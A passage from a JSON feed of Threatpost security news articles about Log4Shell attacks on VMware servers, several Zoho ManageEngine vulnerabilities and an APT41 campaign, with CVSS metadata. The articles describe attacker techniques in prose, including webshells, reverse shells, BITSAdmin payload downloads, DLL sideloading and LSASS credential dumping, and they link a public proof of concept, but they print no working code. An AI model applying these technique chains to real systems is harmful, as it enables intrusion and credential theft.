monitoring and management tool. However, the threat actors aren\u2019t attacking existing Atera installations, per se, the researchers said. Rather, \u201cthey install their own Atera agents in order to use the Atera cloud management infrastructure to deploy additional payloads in the future,\u201d they explained.\n\nSophos also found the legitimate Splashtop Streamer remote-access tool being downloaded and installed on infected systems, \u201cprobably as an automated task for the new clients.\u201d\n\nAs well, there were several PowerShell-based reverse shells in the payload mix that had been dropped by the Log4Shell exploits.\n\n## Two Types of Reverse Shells\n\nSophos found two types of reverse shell: one, a shorter script that opens a socket connection to a remote server and executes the received buffer, which is supposed to be a PowerShell command.\n\nThey also found a larger variant of a reverse shell: one that can reflectively load a Windows binary, with the loader as an encrypted and base64 encoded blob, as depicted below:\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/29155214/Base64_encoded_blob-e1648583546965.jpg>)\n\nBase64 encoded blob. Source: Sophos.\n\nSophos telemetry showed that while z0Miner, JavaX and some other payloads were downloaded directly by the web shells that had been used for initial compromise, the Jin bots were tied to use of Sliver and used the same wallets as Mimo, \u201csuggesting these three malware were used by the same actor,\u201d Sophos said. Researchers believe that Jin is, in fact, \u201csimply a rebranded version of Mimo.\u201d\n\n## Loads of New Malware Loaders\n\nNew malware loaders are springing up like dandelions in the spring. Besides the ones covered by Sophos in Tuesday\u2019s report, security researchers at Symantec today also published a technical[ report](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUeZY5vOK6hHL-2FZQIhe5-2B4JVOehUh4Rb8p3ey37Q9OVEIiWGDSjejxPvkb8ovY0h-2FaWB9dvcXCl3SBCFSEuV5tcRGFsPYlsbDvD-2BUBbuZrpjG-2F3o76yv-2FjW7fnR-2BbuAqcTKlC8Ql3vteVWIz1-2F4jQ39BlDgn8Ze7x-2FjjxdfusIUCoWeHw_q07lK5GAAVvAnbc-2Fr-2FBDhAPhoMvwzp-2Bdh4wgfTcF0AUhu01ZMXdKNJrsN0iCyDU7ehW0N22Ype9yCK1TM6XYzQ9CpkZyf7pccI4YxuRF0BJuYEbml5ScFK0-2F-2FZqd-2FdTf4msXI8najxJ51o4YJVhtdqJKuSTmaXDsB1uynL70vmZixJBnwPhKCug0sz-2BmD22NzQdTPN5KP9W-2FB8FFI76ksSSNzbmCCaVViVDpzZ8413vH2SK7hoc-2F9PgDFHE5nPDuAWqJnV7-2B1m3omM9hPkKC6f0TGhlnK7L2Rm0UV3m4RfnEylMOpa8zOk3ZpTlH4NHB441qOzaGmeusjrgk12h1-2FHBCuMABwcfwmdXp6d8OUxE-3D>) on a new malware loader tracked as Verblecon that\u2019s escaped detection due to the polymorphic nature of its code.\n\nVerblecon has likewise been seen in attacks that install cryptocurrency miners on compromised machines.\n\nSaryu Nayyar, CEO and founder of[ Gurucul](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUemyDumHlbVHpjKINAYc3Jk-3DThvL_q07lK5GAAVvAnbc-2Fr-2FBDhAPhoMvwzp-2Bdh4wgfTcF0AUhu01ZMXdKNJrsN0iCyDU7ehW0N22Ype9yCK1TM6XYzQ9CpkZyf7pccI4YxuRF0BJuYEbml5ScFK0-2F-2FZqd-2FdTf4msXI8najxJ51o4YJVhtdqJKuSTmaXDsB1uynL70vmZixJBnwPhKCug0sz-2BmD22NzQdTPN5KP9W-2FB8FFI76ksRzfCH77Y1C4pRGOycTIJafHsN-2B4KnSygPf4489ZnosIN0CloPhQCESwF4k9NfwdKmZsgKHx6JGWXjEVL3UpRuh84NABjevUYJLlxFeyFD2KR14VLhnCySOfOl1QNCbp-2F2Vu3lWjuUOLb0td2Dh5r3I-3D>), told Threatpost that in order to fight the legitimate assessment tools being used to breach organizations, it\u2019s also \u201ccritical\u201d to employ sophisticated technologies \u2013 namely, self-training machine learning and behavioral models \u2013 to sniff out exploitation of exposed vulnerabilities as well as to detect the remote surveillance done by attackers with tools such as Cobalt Strike, et al.\n\n\u201cCurrent [extended detection and response, or XDR] and traditional [security information and event management, or SIEM] solutions, even with claims of User Entity Behavior Analytics rooted in known patterns and rule-based artificial intelligence, are unable to adapt to these methods,\u201d she told Threatpost via email. \u201cOrganizations need to invest in solutions that employ transparent non rule-based machine learning models to more rapidly identify new attacks.\u201d\n\nChris Olson, CEO of digital safety platform The Media Trust, told Threatpost on Tuesday that polymorphic techniques \u201care just another way to hide malicious intentions, along with checks for security tools and live environments.\u201d\n\nThis attack provides another example of how the risks of Web 2.0 are being replicated in Web 3.0, he said via email.\n\n\u201cToday\u2019s embryonic beginnings of Web 3.0 are eerily reminiscent of the Web as it existed in the 1990s, showing sporadic signs of vulnerability that may well foreshadow a future era of cyber chaos,\u201d Olson said.\n\nTo prevent that from happening, we must learn from our past mistakes, he warned. \u201cToday\u2019s digital ecosystem is riddled with threats because Web 2.0 was not designed for cybersecurity from the outset. Untrusted third parties were allowed to proliferate, leading to phishing attacks, malicious advertising, rampant data privacy abuse and other threats that are hard to fix in the present. With Web 3.0, we have a chance to account for potential attack vectors by design \u2013 otherwise, the same issues will replicate themselves with greater potency than ever.\u201d\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-29T20:33:08", "type": "threatpost", "title": "Log4JShell Used to Swarm VMware Servers with Miners, Backdoors", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2021-44228"], "modified": "2022-03-29T20:33:08", "id": "THREATPOST:4EEFA1A0FABB9A6E17C3E70F39EB58FE", "href": "https://threatpost.com/log4jshell-swarm-vmware-servers-miners-backdoors/179142/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-18T16:16:07", "description": "A critical security vulnerability in the Zoho ManageEngine Desktop Central and Desktop Central MSP platforms could allow authentication bypass, the company has warned.\n\nThe bug (CVE-2021-44757) could allow a remote user to \u201cperform unauthorized actions in the server,\u201d according to the company\u2019s Monday [security advisory](<https://pitstop.manageengine.com/portal/en/community/topic/a-critical-security-patch-released-in-desktop-central-and-desktop-central-msp-for-cve-2021-44757-17-1-2022>). \u201cIf exploited, this vulnerability may allow an attacker to read unauthorized data or write an arbitrary .ZIP file on the server.\u201d\n\nZoho\u2019s ManageEngine Desktop Central is a unified endpoint management (UEM) solution that lets IT admins manage servers, laptops, desktops, smartphones and tablets from a central location. Users can automate routines like installing patches, deploying software, imaging and deploying OS, according to the company\u2019s [documentation.](<https://www.manageengine.com/products/desktop-central/software-installation-supported-executables-how-to.html>) It can also be used to manage assets and software licenses, monitor software-usage statistics, manage USB device usage, take control of remote desktops, and more.\n\nOn the mobile side, users can deploy profiles and policies; configure devices for Wi-Fi, VPNs, email accounts and so on; apply restrictions on application installs, camera usage and the browser; and manage security with passcodes and remote lock/wipe functionality.\n\nAs such, the platform offers far-reaching access into the guts of an organization\u2019s IT footprint, making for an information-disclosure nightmare in the case of an exploit, potentially. As well, the [ability to install a .ZIP file](<https://www.manageengine.com/products/desktop-central/software-installation-supported-executables-how-to.html>) paves the way for the installation of malware on all of the endpoints managed by the Desktop Central instance.\n\nIn the case of the MSP version \u2013 which, as its name suggests, allows managed service providers (MSPs) to offer endpoint management to their own customers \u2013 the bug could be used in a [supply-chain attack](<https://threatpost.com/kaseya-attack-fallout/167541/>). Cybercriminals can simply compromise one MSP\u2019s Desktop Central MSP edition and potentially gain access to the customers whose footprints are being managed using it, depending on security measures the provider has put in place.\n\nZoho ManageEngine [released a Knowledge Base entry detailing patches](<https://www.manageengine.com/products/desktop-central/cve-2021-44757.html>) on Monday, and users are encouraged to update to the latest build in order to protect themselves. The firm also offered tips for general hardening of Desktop Central environments in the KB article.\n\n## **Zoho ManageEngine: Popular for Zero-Day Attacks**\n\nThe company didn\u2019t say whether the bug has been under attack as a zero-day vulnerability, but it\u2019s a good bet that cyberattackers will start targeting it for exploit if they haven\u2019t already. The ManageEngine platform is a popular one for attackers, given its all-seeing nature.\n\nThis played out in September, for instance, when a critical security vulnerability (CVE-2021-40539) in the Zoho ManageEngine ADSelfService Plus platform was patched; it could allow remote attackers to bypass authentication and have free rein across users\u2019 Active Directory (AD) and cloud accounts. But it was [under active attack](<https://threatpost.com/zoho-password-manager-zero-day-attack/169303/>) even before it was fixed, according to the Cybersecurity and Infrastructure Security Agency (CISA).\n\nIn December, the FBI even went so far as to issue [an official alert](<https://threatpost.com/zoho-zero-day-manageengine-active-attack/177178/>) after a Zoho ManageEngine zero-day vulnerability was found to be under active attack from an advanced persistent threat (APT) group. That bug (CVE-2021-44515) could allow remote attackers to override legitimate functions of servers running ManageEngine Desktop Central and to elevate privileges \u2013 with an ultimate goal of dropping malware onto organizations\u2019 networks.\n\n**_Password_**_ _**_Reset: _****_[On-Demand Event](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/>):_**_ Fortify 2022 with a password-security strategy built for today\u2019s threats. This [Threatpost Security Roundtable](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/>), built for infosec professionals, centers on enterprise credential management, the new password basics and mitigating post-credential breaches. Join Darren James, with Specops Software and Roger Grimes, defense evangelist at KnowBe4 and Threatpost host Becky Bracken. _**_[Register &amp; stream this FREE session today](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/>)_**_ \u2013 sponsored by Specops Software._\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-01-18T15:44:21", "type": "threatpost", "title": "Critical ManageEngine Desktop Server Bug Opens Orgs to Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539", "CVE-2021-44515", "CVE-2021-44757"], "modified": "2022-01-18T15:44:21", "id": "THREATPOST:98AF08B524D08ABCEB115FECEE99B70F", "href": "https://threatpost.com/critical-manageengine-desktop-server-bug-malware/177705/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-21T14:43:15", "description": "Another Zoho ManageEngine zero-day vulnerability is under active attack from an APT group, this time looking to override legitimate functions of servers running ManageEngine Desktop Central and elevate privileges \u2014 with an ultimate goal of dropping malware onto organizations\u2019 networks, the FBI has warned.\n\nAPT actors have been exploiting the bug, tracked as [CVE-2021-44515](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44515>), since at least late October, the feds revealed in an [FBI Flash alert](<https://www.ic3.gov/Media/News/2021/211220.pdf>) released last week. There is also evidence to support that it\u2019s being used in an attack chain with two other Zoho bugs that researchers have observed under attack since September, according to the alert.\n\nThe latest vulnerability is an authentication-bypass vulnerability in ManageEngine Desktop Central that can allow an attacker to execute arbitrary code in the Desktop Central server, according to a Zoho [advisory](<https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html>) that addressed the issue, published earlier this month.\n\nIndeed, the feds said they observed APT actors doing exactly that. More specifically, researchers observed attackers \u201ccompromising Desktop Central servers, dropping a webshell that overrides a legitimate function of Desktop Central, downloading post-exploitation tools, enumerating domain users and groups, conducting network reconnaissance, attempting lateral movement and dumping credentials,\u201d according to the Flash Alert.\n\nZoho has addressed the vulnerability and is urging organizations to update to the appropriate latest builds of ManageEngine Desktop Central due to \u201cindications of exploitation,\u201d the company said in its advisory.\n\nSpecifically, the company is advising enterprise customers who have builds10.1.2127.17 and below deployed to upgrade to build [10.1.2127.18](<https://downloads.zohocorp.com/dnd/Desktop_Central/vSfr4V3f7NXjEJK/ManageEngine_Desktop_Central_10_1_0_SP-2127_18.ppm>); and those using builds 10.1.2128.0 to 10.1.2137.2 to upgrade to build [10.1.2137.3](<https://downloads.zohocorp.com/dnd/Desktop_Central/5fbkfifZFuh9mVx/ManageEngine_Desktop_Central_10_1_0_SP-2137_3.ppm>).\n\n## **Zoho Under Fire**\n\nThe bug is the third zero-day under active attack that researchers have discovered in the cloud platform company\u2019s ManageEngine suite since September, spurring dire warnings from the FBI and researchers alike.\n\nThough no one has yet conclusively identified the APT responsible, it\u2019s likely the attacks are linked and those responsible are from China, previous evidence has shown.\n\nEarlier this month, researchers at Palo Alto Networks Unit 42 [revealed](<https://threatpost.com/threat-group-takes-aim-again-at-cloud-platform-provider-zoho/176732/>) that state-backed adversaries were using vulnerable versions of ManageEngine ServiceDesk Plus to target a number of U.S. organizations between late October and November.\n\nThe attacks were related to a bug revealed in a Nov. 22 [security advisory](<https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-servicedesk-plus-versions-up-to-11305-22-11-2021>) by Zoho alerting customers of active exploitation against newly registered [CVE-2021-44077](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44077>) found in Manage Engine ServiceDesk Plus. The vulnerability, which allows for unauthenticated remote code execution, impacts ServiceDesk Plus versions 11305 and below.\n\nThat news came on the heels of [warnings](<https://threatpost.com/cisa-fbi-state-backed-apts-exploit-critical-zoho-bug/174768/>) in September by the FBI, CISA and the U.S. Coast Guard Cyber Command (CGCYBER) that an unspecified APT was exploiting a then-zero-day vulnerability in Zoho ManageEngine\u2019s password management solution called ADSelfService Plus.\n\nZoho issued [a fix](<https://threatpost.com/zoho-password-manager-zero-day-attack/169303/>) for the vulnerability, tracked as [CVE-2021-40539](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40539>), soon after; still, researchers observed attackers [exploiting it](<https://threatpost.com/zoho-password-manager-flaw-godzilla-webshell/176063/>) later in November in their continued assault on defense, energy and healthcare organizations.\n\nUnit 42 researchers combined the two previously known active attack fronts against Zoho\u2019s ManageEngine as the [\u201cTitledTemple\u201d](<https://unit42.paloaltonetworks.com/tiltedtemple-manageengine-servicedesk-plus/>) campaign, and said earlier this month that there is evidence to link the APT responsible to China, although it is not conclusive.\n\nThe latest Flash Alert released by the FBI also shows a correlation between earlier APT attacks on ManageEngine and AdSelfService Plus, with malicious samples of code observed in the latest exploitation \u201cdownloaded from likely compromised ManageEngine \nADSelfService Plus servers,\u201d according to the alert.\n\n## **Inside the Exploitation **\n\nThose samples show initial exploitation of a Desktop Central API URL that allowed for an unauthenticated file upload of two different variants of webshells; the first variant was delivered using either the file name \u201cemsaler.zip\u201d or \u201ceco-inflect.jar\u201d in late October and mid-November, respectively; and a second variant using the file name \u201caaa.zip\u201d in late November.\n\nThe webshell overrides the legitimate Desktop Central API servlet endpoint, \u201c/fos/statuscheck,\u201d and either filters inbound GET in the case of the second variant, or POST requests in the case of the first variant, to that URL path, according to the FBI. It then allows attackers to execute commands as the SYSTEM user with elevated privileges if the inbound requests pass the filter check.\n\nThe webshell allows attackers to conduct initial reconnaissance and domain enumeration, after which the actors use BITSAdmin to download a likely ShadowPad variant dropper with filename mscoree.dll, and a legitimate Microsoft AppLaunch binary, iop.exe, according to the FBI. Attackers then sideload the dropper through AppLaunch execution, creating a persistent service to execute the AppLaunch binary moving forward.\n\n\u201cUpon execution, the dropper creates an instance of svchost and injects code with RAT-like functionality that initiates a connection to a command and control server,\u201d according to the FBI.\n\nThreat actors conduct follow-on intrusion activity through the RAT, including attempted lateral movement to domain controllers and credential dumping techniques using Mimikatz, comsvcs.dll LSASS process memory dumping, and a WDigest downgrade attack with subsequent LSASS dumping through pwdump, researchers observed.\n\nThe FBI Flash Alert includes a detailed list of indicators of compromise so organizations using Zoho\u2019s ManageEngine Desktop Central can check to see if they are at risk or have been a victim of attack.\n\n**_Check out our free _**[**_upcoming live and on-demand online town halls_**](<https://threatpost.com/category/webinars/>) **_\u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-12-21T14:42:02", "type": "threatpost", "title": "FBI: Another Zoho ManageEngine Zero-Day Under Active Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539", "CVE-2021-44077", "CVE-2021-44515"], "modified": "2021-12-21T14:42:02", "id": "THREATPOST:927CAECDA58E6BC3266D14FE340589BB", "href": "https://threatpost.com/zoho-zero-day-manageengine-active-attack/177178/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:27:50", "description": "UPDATE\n\nA zero-day vulnerability has been disclosed in the IT help desk ManageEngine software made by Zoho Corp. The serious vulnerability enables an unauthenticated, remote attacker to launch attacks on affected systems. Zoho has now [released a security update](<https://www.us-cert.gov/ncas/current-activity/2020/03/06/zoho-releases-security-update-manageengine-desktop-central>) addressing the vulnerability.\n\nAs of Monday, March 9, the vulnerability has been observed being actively exploited in the wild, according to a [Center for Internet Security advisory](<https://www.cisecurity.org/advisory/a-vulnerability-in-manageengine-desktop-central-could-allow-for-remote-code-execution_2020-033/>).\n\nThe vulnerability, [first reported by ZDNet](<https://www.zdnet.com/article/zoho-zero-day-published-on-twitter/#ftag=RSSbaffb68>), exists in Zoho ManageEngine Desktop Central, an endpoint management tool to help users manage their servers, laptops, smartphones, and more from a central location. Steven Seeley of Source Incite, [disclosed the flaw](<https://srcincite.io/advisories/src-2020-0011/>) on Twitter, Thursday, along with a proof of concept (PoC) exploit. According to ZDNet, the enterprise software development company will release a patch for the flaw on Friday.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThis vulnerability allows remote attackers to execute arbitrary code on affected installations of ManageEngine Desktop Central. Authentication is not required to exploit this vulnerability,\u201d according to Seeley.\n\nAccording to Seeley, the specific flaw exists within the FileStorage class of the Desktop Central. The FileStorage class is used to store data for reading data to or from a file. The issue results from improper validation of user-supplied data, which can result in deserialization of untrusted data.\n\nSeeley told Threatpost, attacker can leverage this vulnerability to execute code under the context of SYSTEM, giving them \u201cfull control of the target machine\u2026 basically the worst it gets.\u201d\n\n> Since [@zoho](<https://twitter.com/zoho?ref_src=twsrc%5Etfw>) typically ignores researchers, I figured it was OK to share a ManageEngine Desktop Central zero-day exploit with everyone. UnCVE'ed, unpatched and unauthenticated RCE as SYSTEM/root. Enjoy!\n> \n> Advisory: <https://t.co/U9LZPp4l5o> \nExploit: <https://t.co/LtR75bhooy>\n> \n> \u2014 \u03fb\u0433_\u03fb\u03b5 (@steventseeley) [March 5, 2020](<https://twitter.com/steventseeley/status/1235635108498948096?ref_src=twsrc%5Etfw>)\n\nAccording to Seeley, who also posted a [PoC attack for the flaw on Twitter](<https://srcincite.io/pocs/src-2020-0011.py.txt>), the vulnerability ranks 9.8 out of 10.0 on the CVSS scale, making it critical in severity. Nate Warfield, a security researcher with Microsoft, pointed to[ at least 2,300](<https://twitter.com/n0x08/status/1235637306838532096>) Zoho systems potentially exposed online.\n\nRick Holland, CISO and vice president of strategy at Digital Shadows, said if an attacker can compromise a solution like ManageEngine, they have an \u201copen season\u201d on a target company\u2019s environment.\n\n\u201cAn attacker has a myriad of options not limited to: accelerating reconnaissance of the target environment, deploying their malware including ransomware, or even remotely monitor users\u2019 machines,\u201d Holland told Threatpost. \u201cGiven that this vulnerability enables unauthenticated remote execution of code, it is even more vital that companies deploy a patch as soon as it becomes available. Internet-facing deployments of Desktop Central should be taken offline immediately.\u201d\n\nThreatpost has reached out to Zoho via email and Twitter for further comment; the company has not yet responded. However Zoho said on Twitter, \u201cwe have identified the issue and are working on a patch with top priority. We will update once it is done.\u201d\n\n> We have identified the issue and are working on a patch with top priority. We will update once it is done. ^BG\n> \n> \u2014 Zoho (@zoho) [March 6, 2020](<https://twitter.com/zoho/status/1235811733194682368?ref_src=twsrc%5Etfw>)\n\nSeeley told Threatpost that he didn\u2019t contact Zoho before disclosing the vulnerability due to negative previous experiences with the company regarding vulnerability disclosure. \u201cI have in the past for other critical vulnerabilities and they ignored me,\u201d he said.\n\nThis lack of responsible disclosure has drawn mixed opinions from security experts. Some, like Rui Lopes, engineering and technical support director at Panda Security, told Threatpost that the incident could leave vulnerable systems open to bad actors.\n\n\u201cThere seems to be some breakdown of communication between independent researchers and the solution vendors who offer centralized IT management platforms, which inevitably leads to inefficient patching protocols and the exposure of sensitive information that arms bad actors with threat vectors that would be otherwise unknown.\u201d\n\nTim Wade, technical director of the CTO Team at Vectra, told Threatpost that the incident highlights the need for better relationships between security researchers and organizations.\n\n\u201cAllegedly, Zoho\u2019s reputation for ignoring security researchers who\u2019ve found exploitable bugs in their products factored into the decision for a direct release,\u201d he said. \u201cWhile the merits of this decision may be discussed fairly from multiple perspectives, at a minimum it underscores the need for software organizations to foster better relationships with the security community, and the seriousness of failing to do so.\u201d\n\nResearchers previously found multiple critical flaws in 2018 in Zoho\u2019s [ManageEngine software](<https://threatpost.com/multiple-critical-flaws-found-in-zohos-manageengine/129709/>). In all, seven vulnerabilities were discovered, each allowing an attacker to ultimately take control of host servers running ManageEngine\u2019s SaaS suite of applications. Also previously a massive number of [keylogger phishing campaigns](<https://threatpost.com/keyloggers-turn-to-zoho-office-suite-in-droves-for-data-exfiltration/137868/>) were seen tied to the Zoho online office suite software; in an analysis, a full 40 percent spotted in October 2018 used a zoho.com or zoho.eu email address to exfiltrate data from victim machines.\n\n_This article was updated Friday at 4:36 pm to reflect that Zoho has released a patch; and on Monday at 4pm to reflect that the flaw is now being actively exploited in the wild._\n\n**_Interested in security for the Internet of Things and how 5G will change the threat landscape? Join our free Threatpost webinar, [\u201c5G, the Olympics and Next-Gen Security Challenges,\u201d](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>) as our panel discusses what use cases to expect in 2020 (the Olympics will be a first test), why 5G security risks are different, the role of AI in defense and how enterprises can manage their risk. [Register here](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>)._**\n", "cvss3": {}, "published": "2020-03-06T16:53:00", "type": "threatpost", "title": "Critical Zoho Zero-Day Flaw Disclosed", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-10189", "CVE-2020-1472", "CVE-2020-5135"], "modified": "2020-03-06T16:53:00", "id": "THREATPOST:199785A97C530FECDF2B53B871FBE1C2", "href": "https://threatpost.com/critical-zoho-zero-day-flaw-disclosed/153484/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:22:15", "description": "Researchers warn that APT41, a notorious China-linked threat group, has targeted more than 75 organizations worldwide in \u201cone of the broadest campaigns by a Chinese cyber-espionage actor observed in recent years.\u201d\n\nBetween Jan. 20 and March 11, researchers observed APT41 exploiting vulnerabilities in Citrix NetScaler/ADC, Cisco routers and Zoho ManageEngine Desktop Central as part of the widespread espionage campaign. Researchers said it\u2019s unclear if APT41 attempted exploitation en masse, or if they honed in on specific organizations \u2014 but the victims do appear to be more targeted in nature.\n\n\u201cWhile APT41 has previously conducted activity with an extensive initial entry such as the trojanizing of NetSarang software, this scanning and exploitation has focused on a subset of our customers, and seems to reveal a high operational tempo and wide collection requirements for APT41,\u201d wrote Christopher Glyer, Dan Perez, Sarah Jones and Steve Miller with FireEye, in a [Wednesday analysis](<https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html>).\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nDozens of companies were targeted from varying industries, including banking and finance, defense industrial bases, government, healthcare, legal, manufacturing, media, non-profit, oil and gas, transportation and utilities. APT41 also targeted firms from a broad array of countries, including Australia, Canada, Denmark, Finland, France, India, Italy, Japan, Malaysia, Mexico, Philippines, Poland, Qatar, Saudi Arabia, Singapore, Sweden, Switzerland, UAE, the U.K. and the U.S.\n\n**Cisco, Citrix and Zoho Exploits**\n\nStarting on Jan. 20, researchers observed the threat group attempting to exploit the notorious flaw ([CVE-2019-19781](<https://support.citrix.com/article/CTX267027>)) in Citrix Application Delivery Controller (ADC) and Citrix Gateway devices revealed as a zero-day then patched earlier this year. It was [disclosed on Dec. 17](<https://threatpost.com/critical-citrix-bug-80000-corporate-lans-at-risk/151444/>) \u2013 and [proof of concept (PoC) code](<https://threatpost.com/unpatched-citrix-flaw-exploits/151748/>) was released shortly after \u2013 before a patch [was issued in January](<https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/>).\n\nIn this campaign, researchers observed three waves of exploits against [CVE-2019-19781](<https://threatpost.com/critical-citrix-rce-flaw-corporate-lans/152677/>) \u2013 the first on Jan. 20 \u2013 21, the second on Feb. 1, and finally a \u201csignificant uptick\u201d in exploitation on Feb. 24 \u2013 25.\n\nPost-exploit, APT41 executed a command (\u2018file /bin/pwd\u2019) on affected systems that researchers say may have achieved two objectives: \u201cFirst, it would confirm whether the system was vulnerable and the mitigation wasn\u2019t applied,\u201d researchers noted. \u201cSecond, it may return architecture-related information that would be required knowledge for APT41 to successfully deploy a backdoor in a follow-up step.\u201d\n\nOn Feb. 21, researchers next observed APT41 switching gears to exploit a Cisco RV320 router (Cisco\u2019s WAN VPN routers for small businesses) at a telecommunications organization. After exploitation, the threat actors downloaded an executable and linkable format (ELF) binary payload. Researchers aren\u2019t sure what specific exploit was used in this case, but pointed to a Metasploit module combining two CVEs ([CVE-2019-1653](<https://nvd.nist.gov/vuln/detail/CVE-2019-1653>) and [CVE-2019-1652](<https://nvd.nist.gov/vuln/detail/CVE-2019-1652>)) to [enable remote code execution on Cisco RV320 and RV325](<https://www.rapid7.com/db/modules/exploit/linux/http/cisco_rv32x_rce>) small business routers.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/03/25112442/APT41-timeline.png>)\n\nFinally, on March 8, the threat actor was observed [exploiting a critical vulnerability](<https://threatpost.com/critical-zoho-zero-day-flaw-disclosed/153484/>) in Zoho ManageEngine Desktop Central, an endpoint management tool to help users manage their servers, laptops, smartphones, and more from a central location. The flaw ([CVE-2020-10189)](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>) was first disclosed on March 5 as a zero-day, and [was later patched](<https://www.us-cert.gov/ncas/current-activity/2020/03/06/zoho-releases-security-update-manageengine-desktop-central>) on March 7. The attackers exploited the flaw to deploy payloads (install.bat and storesyncsvc.dll) in two ways. First, after exploiting the flaw they directly uploaded a simple Java-based program (\u201clogger.zip\u201d) containing a set of commands, which then used PowerShell to download and execute the payloads. In a second attack, APT41 leveraged a legitimate Microsoft command-line tool, BITSAdmin, to download the payload.\n\nNotably, after exploitation, the attackers have been seen only leveraging publicly available malware, including Cobalt Strike (a [commercially available exploitation framework](<https://threatpost.com/apt29-re-emerges-after-2-years-with-widespread-espionage-campaign/139246/>)) and Meterpreter (a Metasploit attack payload that provides an interactive shell from which an attacker can explore the target machine and execute code). Said researchers: \u201cWhile these backdoors are full featured, in previous incidents APT41 has waited to deploy more advanced malware until they have fully understood where they were and carried out some initial reconnaissance.\u201d\n\n**APT41 Activity **\n\nInterestingly, between waves of exploitation, researchers observed a lull in APT41 activity. The first lull, 